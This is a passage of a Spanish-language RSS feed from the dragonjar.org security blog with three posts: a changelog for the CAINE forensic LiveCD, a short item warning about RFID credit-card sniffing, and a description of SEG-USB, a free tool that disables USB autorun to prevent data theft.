style="text-align: left;"><strong>Estos son los cambios de la nueva versión:</strong></p><ul><li>Se incorpora el WinTaylor, un frontend de analisis forense para entornos <a
href="http://www.dragonjar.org/tag/windows" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Windows">windows</a></li><li>Paginas HTML compatibles con <a
href="http://www.dragonjar.org/tag/internet" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Internet">internet</a> explorer para correr herramientas forenses en Windows</li><li>Actualizado el Ntfs-3g a la versión 2009.1.1 (resolviendo un bug del ntfs-3g)</li><li>Nueva opción del menú de inicio: Modo Texto</li><li>Actualizados los paquetes de Ubuntu 8.04 (CAINE esta basado en ubuntu)</li><li>Nueva versión del <a
href="http://www.dragonjar.org/tag/firefox" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Firefox">Firefox</a> 3.0.6</li><li>Nueva <a
href="http://www.dragonjar.org/tag/herramienta" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Herramienta">herramienta</a> para realizar hashing de archivos (Gtkhash)</li><li>Nuevas opciones en los reportes: se agrego el nombre del investigador y del reporte</li><li>Reportes en múltiples lenguajes: italiano, ingles,  alemán, francés y portugués ¿para cuando en español?</li><li>Cuando se inicia Firefox se abre un listado con las herramientas y un breve manual de utilización.</li></ul><p><span
id="more-2034"></span></p><h2 style="text-align: center;"><a
href="http://samba.ing.unimo.it/~gianchi/caine05.iso">Descargar CAINE 0.5 LiveCD para Informática Forense </a></h2><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/distribucion-live-cd-analisis-forense.xhtml" title="CAINE &#8211; Distribución Live CD para Análisis Forense">CAINE &#8211; Distribución Live CD para Análisis Forense</a></li><li><a
href="http://www.dragonjar.org/manual-de-metasploit-framework-en-espanol.xhtml" title="Manual de Metasploit Framework en Español">Manual de Metasploit Framework en Español</a></li><li><a
href="http://www.dragonjar.org/instalacion-configuracion-y-uso-del-microsoft-cofee.xhtml" title="Instalación, Configuración y Uso del Microsoft Cofee">Instalación, Configuración y Uso del Microsoft Cofee</a></li><li><a
href="http://www.dragonjar.org/nueva-versin-de-cain-abel.xhtml" title="Nueva versión de Cain &#038; Abel">Nueva versión de Cain &#038; Abel</a></li><li><a
href="http://www.dragonjar.org/manual-de-truecrypt.xhtml" title="Manual de TrueCrypt">Manual de TrueCrypt</a></li><li><a
href="http://www.dragonjar.org/informacion-para-reto-forense-campus-party-2011.xhtml" title="Información para Reto Forense Campus party 2011">Información para Reto Forense Campus party 2011</a></li><li><a
href="http://www.dragonjar.org/dominando-el-metasploit-framework.xhtml" title="Dominando el Metasploit Framework">Dominando el Metasploit Framework</a></li><li><a
href="http://www.dragonjar.org/documental-sobre-arduino-en-espanol.xhtml" title="Documental sobre Arduino en Español">Documental sobre Arduino en Español</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/nueva-version-del-caine-livecd-para-informatica-forense.xhtml/feed</wfw:commentRss> <slash:comments>9</slash:comments> </item> <item><title>Video: Robar Informacion tarjetas de crédito con RFID</title><link>http://www.dragonjar.org/robar-informacion-de-tarjetas-de-credito-rfid.xhtml</link> <comments>http://www.dragonjar.org/robar-informacion-de-tarjetas-de-credito-rfid.xhtml#comments</comments> <pubDate>Sat, 06 Sep 2008 21:17:48 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Artículos sobre seguridad]]></category> <category><![CDATA[Noticias Seguridad]]></category> <category><![CDATA[Crédito]]></category> <category><![CDATA[Informacion]]></category> <category><![CDATA[RFID]]></category> <category><![CDATA[Robo]]></category> <category><![CDATA[Sniffer]]></category> <category><![CDATA[Tarjeta]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=1213</guid> <description><![CDATA[En Boing Boing, me encontré un vídeo de marzo de este año donde muestran lo BARATO (un sniffer de RFID vale 8 dolares en eBay) y sencillo que resulta capturar información de una tarjeta de crédito RFID con solo estar. Tendremos que usar ese tipo de billeteras ya que en un metro, transmilenio o cualquier [...]]]></description> <content:encoded><![CDATA[<p>En <a
href="http://tv.boingboing.net/2008/03/19/how-to-hack-an-rfide.html">Boing Boing</a>, me encontré un vídeo de marzo de este año donde muestran lo BARATO (un <a
href="http://www.dragonjar.org/tag/sniffer" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Sniffer">sniffer</a> de <a
href="http://www.dragonjar.org/tag/rfid" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con RFID">RFID</a> vale 8 dolares en eBay) y sencillo que resulta capturar información de una <a
href="http://www.dragonjar.org/tag/tarjeta" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Tarjeta">tarjeta</a> de <a
href="http://www.dragonjar.org/tag/credito" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Crédito">crédito</a> RFID con solo estar.</p><p><center><embed
class="castfire_player" id="cf_4a893" name="cf_4a893" src="http://p.castfire.com/Xu7m0/video/8913/bbtv_2008-03-18-195242.flv" type="application/x-shockwave-flash" allowfullscreen="true" width="425" height="344"></embed></center></p><p>Tendremos que usar ese tipo de billeteras ya que en un metro, transmilenio o cualquier sistema de transporte masivo seria muy sencillo ser victimas del <a
href="http://www.dragonjar.org/tag/robo" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Robo">robo</a> de información en tarjetas de crédito RFID.</p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/the-real-hustle-los-fraudes-al-descubierto.xhtml" title="The Real Hustle &#8211;  Los fraudes al descubierto">The Real Hustle &#8211;  Los fraudes al descubierto</a></li><li><a
href="http://www.dragonjar.org/seg-usb-herramienta-gratuita-para-prevenir-el-robo-de-informacion-en-dispositivos-usb.xhtml" title="SEG-USB herramienta gratuita para prevenir el robo de información en dispositivos USB">SEG-USB herramienta gratuita para prevenir el robo de información en dispositivos USB</a></li><li><a
href="http://www.dragonjar.org/como-recuperar-una-cuenta-de-twitter.xhtml" title="¿Cómo Recuperar una Cuenta de Twitter? ">¿Cómo Recuperar una Cuenta de Twitter? </a></li><li><a
href="http://www.dragonjar.org/como-recuperar-una-cuenta-de-facebook.xhtml" title="¿Cómo Recuperar una Cuenta de Facebook?">¿Cómo Recuperar una Cuenta de Facebook?</a></li><li><a
href="http://www.dragonjar.org/analisis-de-trafico-con-wireshark.xhtml" title="Análisis de tráfico con Wireshark">Análisis de tráfico con Wireshark</a></li><li><a
href="http://www.dragonjar.org/mastercard-y-microsoft-me-premiaron.xhtml" title="Mastercard y Microsoft me premiaron!!">Mastercard y Microsoft me premiaron!!</a></li><li><a
href="http://www.dragonjar.org/repositorio-con-herramientas-de-seguridad.xhtml" title="Repositorio con Herramientas de Seguridad">Repositorio con Herramientas de Seguridad</a></li><li><a
href="http://www.dragonjar.org/x-campo-generador-de-payloads-xss.xhtml" title="X Campo – Generador de payloads XSS">X Campo – Generador de payloads XSS</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/robar-informacion-de-tarjetas-de-credito-rfid.xhtml/feed</wfw:commentRss> <slash:comments>16</slash:comments> </item> <item><title>SEG-USB herramienta gratuita para prevenir el robo de información en dispositivos USB</title><link>http://www.dragonjar.org/seg-usb-herramienta-gratuita-para-prevenir-el-robo-de-informacion-en-dispositivos-usb.xhtml</link> <comments>http://www.dragonjar.org/seg-usb-herramienta-gratuita-para-prevenir-el-robo-de-informacion-en-dispositivos-usb.xhtml#comments</comments> <pubDate>Mon, 14 Apr 2008 13:51:58 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Eventos en seguridad]]></category> <category><![CDATA[Herramientas Seguridad]]></category> <category><![CDATA[Informacion]]></category> <category><![CDATA[Memoria]]></category> <category><![CDATA[Proteger]]></category> <category><![CDATA[Robo]]></category> <category><![CDATA[USB]]></category> <category><![CDATA[Virus]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=298</guid> <description><![CDATA[El alto crecimiento de herramientas malwares preparadas para el robo de información, obtener claves o infectar nuestra maquinas, etc, es un hecho cotidiano. Tras un análisis realizado por la Comisión de Seguridad de la Asociación de Internautas se comprobó el uso de malware por terceros usando simples dispositivos USB preparados para obtener datos de nuestras [...]]]></description> <content:encoded><![CDATA[<p>El alto crecimiento de herramientas malwares preparadas para el <a
href="http://www.dragonjar.org/tag/robo" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Robo">robo</a> de información, obtener claves o infectar nuestra maquinas, etc, es un hecho cotidiano. Tras un análisis realizado por la Comisión de <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">Seguridad</a> de la Asociación de Internautas se comprobó el uso de malware por terceros usando simples dispositivos <a
href="http://www.dragonjar.org/tag/usb" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con USB">USB</a> preparados para obtener datos de nuestras maquinas, por ello se crea una <a
href="http://www.dragonjar.org/tag/herramienta" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Herramienta">herramienta</a> gratuita para la prevención de robo de datos por medio de <a
href="http://www.dragonjar.org/tag/usb" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con USB">USB</a>.</p><p>El siguiente ejemplo encontrado en un foro nos demuestra lo fácil que es crear un dispositivo USB para obtener datos de nuestra maquina sin nuestro consentimiento:</p><p
style="text-align: center;"><img
style="vertical-align: middle;" src="http://img74.imageshack.us/img74/4584/segusb1wn7.jpg" alt="segusb1wn7 SEG USB herramienta gratuita para prevenir el robo de información en dispositivos USB" width="450" height="620" title="SEG USB herramienta gratuita para prevenir el robo de información en dispositivos USB" /></p><p><span
id="more-298"></span>En poco minutos podemos conseguir una herramienta para obtener datos de un tercero.<br
/> La aplicación gratuita SEG-USB.EXE previene el auto arranqué en dispositivos USB, evitando la ejecución automática de programas sin nuestro consentimiento. El programa contiene dos opciones:</p><ul><li><a
href="http://www.dragonjar.org/tag/prevenir" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Prevenir">Prevenir</a> el uso automático de dispositivos removibles USB<br
/> PREVENCIÓN ACTIVADA</li></ul><ul><li>Configuración original en de dispositivos removibles USB<br
/> PREVENCIÓN DESACTIVADA</li></ul><p
style="text-align: center;"><img
style="vertical-align: middle;" src="http://img149.imageshack.us/img149/6208/segusb2ou0.jpg" alt="segusb2ou0 SEG USB herramienta gratuita para prevenir el robo de información en dispositivos USB" width="408" height="177" title="SEG USB herramienta gratuita para prevenir el robo de información en dispositivos USB" /></p><p>La opción prevención activada nos modifica una clave en registro de nuestra maquina para impedir el autorun de los dispositivos USB, esta clave es la siguiente:</p><p>HKLM\SYSTEM\ControlSet001\Services\USBSTOR\Start</p><p>La opción prevención desactivada restaura la opción de nuestro registro al valor original.<br
/> Solo hace falta usarlo una vez para activar o desactivar la opción seleccionada.<br
/> Esta aplicación gratuita es valida para maquinas con sistema <a
href="http://www.dragonjar.org/tag/microsoft" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Microsoft">Microsoft</a>.</p><p><a
href="http://seguridad.internautas.org/archivos/seg-usb.zip" target="_blank">Descargar SEG-USB</a><br
/> <a
href="http://www.4shared.com/file/44096945/12539f35/seg-usb_wwwdragonjarorg.html" target="_blank">Mirror de la Comunidad</a> (password: www.dragonjar.org)<br
/> Más información y fuente del recurso (José María Luque Guerrero): <a
href="http://www.internautas.org/html/4885.html" target="_blank">Internautas.org</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/backtrack-portable.xhtml" title="BackTrack Portable">BackTrack Portable</a></li><li><a
href="http://www.dragonjar.org/wireshark-portable.xhtml" title="Wireshark Portable">Wireshark Portable</a></li><li><a
href="http://www.dragonjar.org/alarma-definitiva-para-portatil.xhtml" title="La Alarma definitiva para tu Portátil">La Alarma definitiva para tu Portátil</a></li><li><a
href="http://www.dragonjar.org/listado-de-anti-virus-en-la-nube.xhtml" title="Listado de Anti Virus &#8220;en la Nube&#8221;">Listado de Anti Virus &#8220;en la Nube&#8221;</a></li><li><a
href="http://www.dragonjar.org/la-anti-tesis-del-cofee.xhtml" title="Herramienta Anti Forense para Windows">Herramienta Anti Forense para Windows</a></li><li><a
href="http://www.dragonjar.org/memoria-usb-booteable-con-varias-distribuciones-de-seguridad-informatica.xhtml" title="Memoria USB Booteable con Varias Distribuciones de Seguridad Informática">Memoria USB Booteable con Varias Distribuciones de Seguridad Informática</a></li><li><a
href="http://www.dragonjar.org/manual-de-truecrypt.xhtml" title="Manual de TrueCrypt">Manual de TrueCrypt</a></li><li><a
href="http://www.dragonjar.org/robar-informacion-de-tarjetas-de-credito-rfid.xhtml" title="Video: Robar Informacion tarjetas de crédito con RFID">Video: Robar Informacion tarjetas de crédito con RFID</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/seg-usb-herramienta-gratuita-para-prevenir-el-robo-de-informacion-en-dispositivos-usb.xhtml/feed</wfw:commentRss> <slash:comments>4</slash:comments> </item> </channel> </rss>
<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk: basic
Page Caching using disk: enhanced
Database Caching 39/178 queries in 0.211 seconds using disk: basic
Object Caching 7423/7663 objects using disk: basic

Served from: www.dragonjar.org @ 2012-02-11 23:54:41 -->
